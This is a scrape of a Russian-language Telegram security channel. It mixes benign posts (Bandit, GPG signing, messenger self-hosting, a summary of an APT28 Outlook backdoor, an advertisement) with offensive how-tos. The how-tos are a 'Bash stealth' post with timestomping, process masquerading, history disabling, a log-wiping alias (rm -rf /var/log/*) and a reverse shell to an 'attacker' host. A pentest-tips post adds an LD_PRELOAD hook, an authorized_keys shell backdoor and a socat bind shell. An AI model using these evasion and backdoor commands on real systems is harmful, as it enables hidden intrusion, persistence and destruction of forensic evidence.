Анализируем шифрованные скрипты
👋
⏺ Создадим шифрованный скрипт:
Он работает пока рядом есть файлы product_serial и product_uuid. Удалим их, и запуск невозможен: именно они содержат данные для дешифрации.
⏺ Попробуем заглянуть внутрь. Если открыть testme.x в редакторе:
Видим блок Base64 с зашифрованным текстом и строки, явно указывающие на исходники Obash.
⏺ Дальше смотрим, какие библиотеки он тянет:
Среди зависимостей - libcrypto.so, что подтверждает использование AES.
⏺ Теперь глянем системные вызовы:
В логе видно, как программа считывает UUID и Serial, а в конце пишет во временный FIFO-файл /tmp/<PID> полный текст скрипта (175 байт, ровно как исходник). После чтения файл удаляется, но содержимое мы уже перехватили.
⏺ Автоматизируем. Сделаем подменный интерпретатор:
Запускаем с подменой:
В результате скрипт выводится целиком - никакого шифрования уже нет.
ZeroDay | #скрипты
Приветствую в мире цифровой безопасности!
Продолжим говорить о шифровании скриптов, сегодня же будем их анализировать.
./obash testme -o testme.x
Он работает пока рядом есть файлы product_serial и product_uuid. Удалим их, и запуск невозможен: именно они содержат данные для дешифрации.
mcedit testme.x
Видим блок Base64 с зашифрованным текстом и строки, явно указывающие на исходники Obash.
ldd ./testme.x
Среди зависимостей - libcrypto.so, что подтверждает использование AES.
strace -o log ./testme.x
В логе видно, как программа считывает UUID и Serial, а в конце пишет во временный FIFO-файл /tmp/<PID> полный текст скрипта (175 байт, ровно как исходник). После чтения файл удаляется, но содержимое мы уже перехватили.
gcc fake_interpreter.c -o bash
gcc fake_interpreter.c -o python
Запускаем с подменой:
PATH=.:$PATH ./testme.x
В результате скрипт выводится целиком - никакого шифрования уже нет.
ZeroDay | #скрипты
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14❤4❤🔥2
Корреляция без SIEM: универсальный движок в действии
Обычно правила корреляции живут внутри SIEM и помогают ловить инциденты. Но тот же подход можно использовать и в других местах: от промышленности и SOC до процессов SSDLC и SGRC. Получается единый «движок», который связывает разрозненные события и данные, превращая их в понятные выводы.
⏺ В статье показывают 7 примеров, где такой механизм реально работает: скоринг пользователей в UEBA, макрокорреляции для SOC, прогнозирование рисков в SGRC и даже контроль в АСУ ТП. Один и тот же инструмент, но для разного.
ZeroDay | #Статья
Обычно правила корреляции живут внутри SIEM и помогают ловить инциденты. Но тот же подход можно использовать и в других местах: от промышленности и SOC до процессов SSDLC и SGRC. Получается единый «движок», который связывает разрозненные события и данные, превращая их в понятные выводы.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍2❤🔥1💘1
Bandit: быстрый поиск уязвимостей в Python-коде
👋
⏺ Bandit — классная утилита для поиска уязвимостей в Python-коде.
Она берёт ваши .py файлы, строит AST (абстрактное синтаксическое дерево) и прогоняет его через набор плагинов, которые ищут всё странное: от небезопасного использования eval() до кривой работы с криптографией и возможных SQL-инъекций.
⏺ Python сегодня, очевидно, один из самых популярных языков, а значит и уязвимости в коде на нём часто становятся точкой входа для атак. Bandit может ловить проблемы ещё на этапе разработки или CI/CD. Утилита легко встраивается в пайплайн (pre-commit hooks, GitHub Actions, GitLab CI и пр.) и формирует отчёты в разных форматах — от JSON до HTML.
⏺ Быстрый старт:
Установка через pip:
Проверка всего проекта:
Или проверка конкретного файла:
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!
Поговорим о еще одном инструменте безопасности.
Она берёт ваши .py файлы, строит AST (абстрактное синтаксическое дерево) и прогоняет его через набор плагинов, которые ищут всё странное: от небезопасного использования eval() до кривой работы с криптографией и возможных SQL-инъекций.
Установка через pip:
pip install bandit
Проверка всего проекта:
bandit -r ./my_project
Или проверка конкретного файла:
bandit my_script.py
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18❤🔥4❤3
This media is not supported in your browser
VIEW IN TELEGRAM
5 фишек Bash для скрытности
👋
⏺ Подделка времени файлов: Чтобы файл не выделялся среди новых, можно «состарить» его:
Так скрипт выглядит как старый системный.
⏺ Маскировка процессов: В ps любой увидит ваш процесс. Но можно «притвориться»:
Теперь скрипт похож на системный или веб-сервер.
⏺ Работа без истории: Чтобы команды не остались в ~/.bash_history:
⏺ Алиасы для скрытности: Подменяем стандартные команды:
Первое прячет файлы, второе - убирает следы.
⏺ Скрытый сетевой трафик: Обратный шелл можно завуалировать под HTTPS:
Трафик пойдёт через порт 443, что выглядит в принципе привычно.
ZeroDay | #bash
Приветствую в мире цифровой безопасности!
Давай расскажу о 5 фишках Bash для того, чтобы работать тише.
touch -r /bin/ls hack.sh
touch -t 201801010101.01 hack.sh
Так скрипт выглядит как старый системный.
exec -a "[kworker/0:1H]" ./evil.sh
echo "httpd" > /proc/$$/comm
Теперь скрипт похож на системный или веб-сервер.
HISTFILE=/dev/null
set +o history
history -c && history -w
alias ls='ls --hide=hack.sh'
alias vanish='rm -rf ~/.bash_history /var/log/*'
Первое прячет файлы, второе - убирает следы.
bash -i >& /dev/tcp/attacker/443 0>&1
Трафик пойдёт через порт 443, что выглядит в принципе привычно.
ZeroDay | #bash
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22❤8😱2😁1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга
👋
⏺ LD_PRELOAD для подмены системных вызовов: Если у вас есть возможность писать в /tmp, можно внедрить свою библиотеку. Например, перехватить вызов open() и переправить его в свой файл. Создаём evil.c:
➡️ Собираем:
➡️ Запускаем:
⏺ SSH-ключи без пароля: Многие забывают, что authorized_keys поддерживает опции. Можно добавить туда ключ с хитрым префиксом:
Теперь при подключении запускается ваш шелл, а админ видит «обычный ключ».
⏺ Socat как универсальный биндер: Иногда на цели нет nc, а нужен обратный шелл или проброс. Socat поможет тут:
Или проброс порта с шифрованием:
ZeroDay | #пентест
Приветствую в мире цифровой безопасности!
Расскажу о трех полезных фишках при пентесте.
#include <stdio.h>
#include <dlfcn.h>
#include <fcntl.h>
int open(const char *path, int flags, ...) {
static int (*orig_open)(const char*, int, ...) = NULL;
if (!orig_open) orig_open = dlsym(RTLD_NEXT, "open");
if (strstr(path, "shadow")) return orig_open("/etc/passwd", flags);
return orig_open(path, flags);
}
gcc -fPIC -shared -o evil.so evil.c -ldl
LD_PRELOAD=./evil.so target_binary
command="/bin/bash -i" ssh-rsa AAAAB3...
Теперь при подключении запускается ваш шелл, а админ видит «обычный ключ».
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
Или проброс порта с шифрованием:
socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:localhost:22
ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤5
Какой метод чаще всего юзают хакеры для обхода сигнатурного IDS?
Anonymous Quiz
12%
Использование нестандартных портов
57%
Фрагментация пакетов и изменение порядка TCP-сегментов
19%
Маскировка IP через прокси
12%
Смена User-Agent
❤13❤🔥3😁3
Новая атака группы APT28 на компании в странах НАТО
👋
⏺ NotDoor - что это: VBA-бэкдор для Outlook, который следит за входящей почтой и ждёт «триггерного» письма. Как только оно приходит, хакеры могут забирать файлы, слать данные и выполнять команды на вашей машине. Название связано с тем, что в коде часто встречается слово “Nothing”.
⏺ Как он попадает в систему: через OneDrive с хитрой техникой DLL side-loading. Запускается DLL (SSPICLI.dll) и сразу отключает защиту макросов. Дальше PowerShell-команды шифруют данные, создают устойчивость через реестр и делают всё максимально незаметно.
⏺ Что делает внутри: VBA слушает события Outlook (MAPILogonComplete и NewMailEx), создаёт папку %TEMP%\Temp для временных файлов и отсылает их на Proton Mail. Письма с триггером, например «Daily Report», заставляют выполнять встроенные команды.
⏺ Какие команды умеет: cmd - выполнить команду и прислать результат, cmdno - выполнить тихо, dwn - украсть файлы, upl - загрузить файлы на машину жертвы.
⏺ Скрытность и фишки: хакеры используют Microsoft Dev Tunnels и Telegram для скрытой связи с C2, ротацию доменов через Cloudflare Workers, маскируют трафик под обычные сервисы - почти полностью «невидимы».
ZeroDay | #безопасность
Приветствую в мире цифровой безопасности!
Сегодня разберём кампанию российской группировки APT28, нацеленную на компании в странах НАТО.
ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤9👎4🤔2🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
1😁50🤮16🤣11❤5💋3
Свой мессенджер вместо MAX: Matrix и XMPP на домашнем сервере
В какой-то момент автор статьи понял, что звонить по мобильной сети в 2025 году - это уже моветон: качество хуже, чем в VoIP, а про безопасность и говорить нечего. Популярные мессенджеры вроде Telegram и WhatsApp тоже не вариант: либо риски утечки, либо странные ограничения. А вот MAX у него вообще отказался запускаться - и ладно.
⏺ В статье рассказывается, как на своём сервере автор развернул два конкурирующих протокола - Matrix (Synapse) и XMPP (Ejabberd) - и сравнил их на практике. Пошагово показано разворачивание в Docker с Portainer, объясняется, зачем нужен Coturn для звонков, и какие клиенты удобнее в реальной жизни (спойлер: родители тоже тестировали).
ZeroDay | #Статья
В какой-то момент автор статьи понял, что звонить по мобильной сети в 2025 году - это уже моветон: качество хуже, чем в VoIP, а про безопасность и говорить нечего. Популярные мессенджеры вроде Telegram и WhatsApp тоже не вариант: либо риски утечки, либо странные ограничения. А вот MAX у него вообще отказался запускаться - и ладно.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22😁12❤4🤡2👍1💘1
ZeroDay | #атака
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍5❤🔥3😁1
Киберустойчивость: как бизнес выживает во время атак
👋 Приветствую в мире цифровой безопасности!
— «Вы точно выдержите кибератаку?»
— «А если система ляжет, что будет с нашими данными?»
⏺ Такие вопросы сегодня звучат постоянно. Простое «у нас есть защита» уже не успокаивает - бизнесу важно видеть реальную готовность компании выстоять под атаками. Тут на первый план выходит киберустойчивость - умение продолжать работу даже в случае атаки или сбоя.
⏺ От CISO ждут не стопки отчётов, а прямого ответа: где настоящие риски и как они бьют по бизнесу.
⏺ В Innostage, где, помогают бизнесам строить киберустойчивость, подход строится на трёх принципах:
1️⃣ Измеримость — от «недопустимых событий» до Индекса защищённости.
2️⃣ Управляемость — понятная логика решений, а не хаос.
3️⃣ Финансовая привязка — разговор на языке бизнес-рисков и затрат.
⏺ В итоге киберустойчивость уже не дело одного ИБ, а часть стратегии: помогает контролить риски, принимать решения и показывать клиентам и партнёрам, что компании вполне можно доверять.
📅 Об этом будут говорить профи и эксперты на Kazan Digital Week 17–19 сентября.
ZeroDay | #cybersecurity
— «Вы точно выдержите кибератаку?»
— «А если система ляжет, что будет с нашими данными?»
ZeroDay | #cybersecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡8❤4👍2👨💻2👎1🔥1
Sliver — кроссплатформенный фреймворк для Red Team
👋
⏺ Что это: кроссплатформенный фреймворк для эмуляции атак. Работает на Windows, Mac и Linux, а его импланты подстраиваются под вашу цель.
⏺ А вот что умеет: он генерирует код за секунды, прячет его при компиляции, работает с staged и stageless payloads. Также тут безопасная связь с сервером через mTLS, WireGuard, HTTP(S) и DNS. Можно скриптить на Python или JS/TS, мигрировать процессы, делать инъекции, манипулировать токенами, разворачивать TCP и named pipe pivot, запускать .NET сборки прямо в памяти… и это только часть.
⏺ Зачем нужен: чекнуть, где ваша защита слабая, потренировать команду реагирования и посмотреть, как настоящие Red Team обходят системы, не ломая ничего критичного.
⏺ Быстро стартуем:
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!
Поговорим о еще одном инструменте безопасности.
git clone https://github.com/BishopFox/sliver.git
cd sliver
make
./sliver-server
./sliver-client
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17💘2❤1
Вам — защита от блокировок, нам — анализ рисков и транзакций 💙
Заблокировали из-за «грязной» крипты? Вы не одиноки — только в 2024 году 1500+ российских компаний прошли через заморозку счетов. Регулятору нужны не оправдания, а цифры и факты.
⚡️ Но решение есть!
КоинКит ПРО — первый в России инструмент, который показывает не просто тип источника (биржа, обменник, даркнет), а точные суммы от каждой конкретной площадки. Больше никаких догадок — только факты.
Как это работает:
🔥 Принимайте безопасные решения — получите демо-доступ к КоинКит ПРО, перейдя по ссылке.
Реклама ООО «КоинКит» ИНН 9724089320 coinkyt.com
Заблокировали из-за «грязной» крипты? Вы не одиноки — только в 2024 году 1500+ российских компаний прошли через заморозку счетов. Регулятору нужны не оправдания, а цифры и факты.
КоинКит ПРО — первый в России инструмент, который показывает не просто тип источника (биржа, обменник, даркнет), а точные суммы от каждой конкретной площадки. Больше никаких догадок — только факты.
Как это работает:
✔️ Теперь ваши доказательства выглядят так:🟢 Binance — 1000 USDT🟡 Uniswap — 500 USDT🔴 Tornado Cash — 500 USDT
Вы будeте знать все конкретные площадки, с которыми взаимодействует ваш контрагент.✔️ Получайте отчет, адаптированный под российские реалии и санкционные риски. Больше не нужно собирать доказательства вручную;✔️ Контролируйте свои риски еще детальнее, точечно настраивая допустимые риски на кошельке с API-интеграцией.
Реклама ООО «КоинКит» ИНН 9724089320 coinkyt.com
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6🤡2❤1
This media is not supported in your browser
VIEW IN TELEGRAM
Все тонкости GPG-подписей
👋
⏺ Что это: GPG-подпись - это способ доказать, что файл или сообщение действительно отправил тот, кто его подписал, и что его не подменили по пути. По сути, это как цифровая подпись на бумажном документе, только для файлов и писем. Даже если кто-то перехватит файл, подделать подпись без приватного ключа невозможно.
⏺ Подпись файлов:
1️⃣ Создаём ключ:
Выбираем RSA 4096, срок действия, имя и почту. GPG попросит немного случайных действий (печать, движения мышкой), чтобы ключ был «живым».
2️⃣ Подписываем файл:
Файл msg.gpg теперь содержит ваше сообщение + подпись.
3️⃣ Красивый ASCII-формат:
Или вариант для людей — clear-sign, где сообщение остаётся читаемым:
⏺ Detached signatures: подпись в отдельном файле, если не хотите смешивать её с сообщением:
Проверяем так:
Если кто-то изменит хотя бы один символ, GPG сразу скажет, что подпись плохая.
⏺ Проверка чужих подписей:
GPG проверит подпись, но предупредит, если ключ не доверенный. Подпись будет валидной, но доверять ей - решать вам.
ZeroDay | #GPG
Приветствую в мире цифровой безопасности!
Сегодня разберём, что такое GPG-подписи и зачем они нужны вообще.
gpg --full-gen-key
Выбираем RSA 4096, срок действия, имя и почту. GPG попросит немного случайных действий (печать, движения мышкой), чтобы ключ был «живым».
gpg --sign -u [email protected] msg
Файл msg.gpg теперь содержит ваше сообщение + подпись.
gpg --armor --sign -u [email protected] msg
Или вариант для людей — clear-sign, где сообщение остаётся читаемым:
gpg --clear-sign -u [email protected] msg
gpg --detach-sign -u [email protected] msg
gpg --armor --detach-sign -u [email protected] msg
Проверяем так:
gpg --verify msg.asc
gpg --verify msg.asc msg
Если кто-то изменит хотя бы один символ, GPG сразу скажет, что подпись плохая.
gpg --import key.pub
gpg --verify msg.asc
GPG проверит подпись, но предупредит, если ключ не доверенный. Подпись будет валидной, но доверять ей - решать вам.
ZeroDay | #GPG
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
Какой метод используют продвинутые вредоносы для скрытой автозагрузки без записи в автозагрузку Windows?
Anonymous Quiz
28%
Планировщик заданий
35%
Изменение реестра HKCU\Run
9%
Создание ярлыка в папке Startup
29%
Установка службы через sc.exe
👍4🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
GPG: подписи и доверие к ключам
Часть 2
👋
⏺ Слепо доверять нельзя: Представим: Боб отправляет Алисе свой ключ, но посередине сидит Ева. Она может подделать ключ и «заменить» его на свой. Когда Боб пришлёт сообщение, Ева сможет подписать его своим ключом, и Алиса ничего не заметит. Так что просто скачать чужой ключ и довериться ему - ну так себе идея.
⏺ Web of Trust - сеть доверия: Вместо централизованных сертификатов (как в HTTPS) GPG использует Web of Trust. Смысл прост: ты доверяешь подписям людей, которым доверяешь сам.
Уровни доверия к подписям:
➡️ Не знаю или не буду отвечать
➡️ Не доверяю
➡️ Доверяю ограниченно (для полноценного доверия нужно несколько таких подписей)
➡️ Полностью доверяю (одной подписи достаточно)
➡️ Абсолютно доверяю (только для твоего ключа)
⏺ Пример на практике: У Алисы и Боба есть ключи друзей, и они могут проверить ключи друг друга через общих знакомых, подписать чужие ключи и обменяться подписанными ключами. Теперь никакая Ева им не страшна: подделка одной подписи не даст ей обмануть сеть.
⏺ Подписываем чужой ключ
После этого проверка подписи файла покажет доверие:
Если всё сделано правильно - подпись валидна и доверие подтверждено.
⏺ Проверка реального файла
ZeroDay | #GPG
Часть 2
Приветствую в мире цифровой безопасности!
В прошлый раз мы говорили о GPG-подписях для файлов. В этот раз обсудим, как работает доверие к ключам.
Уровни доверия к подписям:
gpg --edit-key [email protected]
gpg> sign -u Alice
gpg> save
После этого проверка подписи файла покажет доверие:
gpg --verify msg.asc
Если всё сделано правильно - подпись валидна и доверие подтверждено.
wget https://github.com/szaffarano/wofi-power-menu/releases/download/v0.3.1/wofi-power-menu-linux-x64
wget https://github.com/szaffarano/wofi-power-menu/releases/download/v0.3.1/wofi-power-menu-linux-x64.asc
gpg --recv-keys 42BE68F43D528467FC281E2E310FFE86A2E427BA
gpg -u David --lsign-key 42BE68F43D528467FC281E2E310FFE86A2E427BA
gpg --verify wofi-power-menu-linux-x64.asc
ZeroDay | #GPG
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍5
This media is not supported in your browser
VIEW IN TELEGRAM
Приветствую в мире цифровой безопасности!
Сделал для вас новую подборку крутых бесплатных курсов по ИБ и не только на YouTube.
ZeroDay | #Подборка
Please open Telegram to view this post
VIEW IN TELEGRAM
❤14✍3👍1
Deep-dive, или когда обновиться недостаточно
Обновление библиотеки - первое, что советует SCA-отчёт. Но что делать, если патча нет, обновление ломает совместимость или уязвимость - мнимая? В таких случаях можно уже нужно копать глубже: читать CVE, смотреть код, проверять, реально ли приложение вызывает уязвимый путь, и думать про обходные меры.
⏺ В статье будет краткий чек-лист Deep-dive: верификация SCA, поиск первоисточников, оценка эксплуатируемости и практические обходы (конфиги, мониторинг, тестовая эксплуатация). Кейсы на Spring/Struts и Python показывают, как решать прям на практике.
ZeroDay | #Статья
Обновление библиотеки - первое, что советует SCA-отчёт. Но что делать, если патча нет, обновление ломает совместимость или уязвимость - мнимая? В таких случаях можно уже нужно копать глубже: читать CVE, смотреть код, проверять, реально ли приложение вызывает уязвимый путь, и думать про обходные меры.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🏆1